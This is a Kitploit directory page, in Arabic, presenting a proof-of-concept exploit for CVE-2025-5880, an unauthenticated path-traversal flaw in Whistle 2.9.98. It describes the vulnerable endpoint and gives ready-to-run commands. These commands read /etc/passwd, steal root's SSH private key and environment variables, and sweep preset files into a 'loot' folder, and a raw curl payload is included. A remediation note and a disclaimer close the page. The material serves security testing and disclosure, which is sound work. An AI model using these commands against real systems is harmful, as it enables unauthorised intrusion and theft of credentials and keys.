Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-5880-PoC — إثبات مفهوم لاستغلال ثغرة اجتياز المسار غير المصادق عليها في Whistle v2.9.98. | Kitploit
أدوات/GitHubGitHub/yacine-rm/cve-2025-5880-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالتعلم والتعليم
GitHubyacine-rm/cve-2025-5880-poc

CVE-2025-5880-PoC

إثبات مفهوم لاستغلال ثغرة اجتياز المسار غير المصادق عليها في Whistle v2.9.98.

عرض المستودع
14منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-5880 — إثبات المفهوم لثغرة اجتياز المسار في Whistle 2.9.98

Python CVE CWE License

إثبات المفهوم لاستغلال ثغرة اجتياز المسار غير المصادق عليها في Whistle الإصدار 2.9.98.


ملخص الثغرة

الحقلالتفاصيل
معرف CVECVE-2025-5880
CWECWE-22 (اجتياز المسار)
البرنامج المتأثرWhistle ≤ 2.9.98
المنفذ المتأثر/cgi-bin/sessions/get-temp-file
متجه الهجومشبكة - لا يتطلب مصادقة
التأثيرقراءة ملف عشوائي على نظام ملفات المضيف

لا يتم تنقية معامل الاستعلام filename قبل استخدامه لفتح ملف على القرص، مما يسمح للمهاجم بتجاوز دليل الملفات المؤقتة المقصود وقراءة أي ملف يمتلك عملية Whistle صلاحية الوصول إليه (مثل /etc/passwd, /root/.ssh/id_rsa).


البداية السريعة

# استنساخ
git clone https://github.com/YourHandle/CVE-2025-5880
cd CVE-2025-5880
 
# لا تبعيات خارجية
python3 CVE-2025-5880.py -u http://TARGET:8899 --preset passwd

الاستخدام

python3 CVE-2025-5880.py [-h] -u URL [-f FILE] [--preset PRESET]
                          [--sweep] [-o OUTPUT] [--save-dir DIR]
                          [--timeout N]
العلمالوصف
-u / --urlعنوان URL الأساسي للهدف (مثل http://192.168.1.10:8899)
-f / --fileمسار ملف عشوائي للقراءة
--presetاختصار مسمى: passwd shadow hosts id_rsa …
--sweepتكرار جميع الاختصارات تلقائيًا
-o / --outputحفظ النتيجة في ملف
--save-dirالدليل لحفظ الغنائم من --sweep
--timeoutمهلة HTTP بالثواني (الافتراضي 10)

أمثلة

# قراءة /etc/passwd
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --preset passwd
 
# الحصول على مفتاح SSH الخاص لـ root
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --preset id_rsa -o id_rsa.pem
 
# قراءة مسار عشوائي
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 -f /proc/self/environ
 
# مسح وحفظ جميع الاختصارات
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --sweep --save-dir ./loot

إثبات المفهوم الخام (curl)

# /etc/passwd
curl -s "http://TARGET:8899/cgi-bin/sessions/get-temp-file?filename=/etc/passwd" | jq -r '.value'

المعالجة

قم بتحديث Whistle إلى إصدار يتحقق من معامل filename ويقيده بدليل الملفات المؤقتة المقصود. قم بتطبيق تسوية المسار بالقائمة البيضاء (مثل path.resolve + التحقق من البادئة) على جانب الخادم.


إخلاء مسؤولية

تم تقديم هذه الأداة لأغراض اختبار الأمان المصرح به والتعليم فقط.
الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني وغير أخلاقي.
لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام.

تنزيل الأداة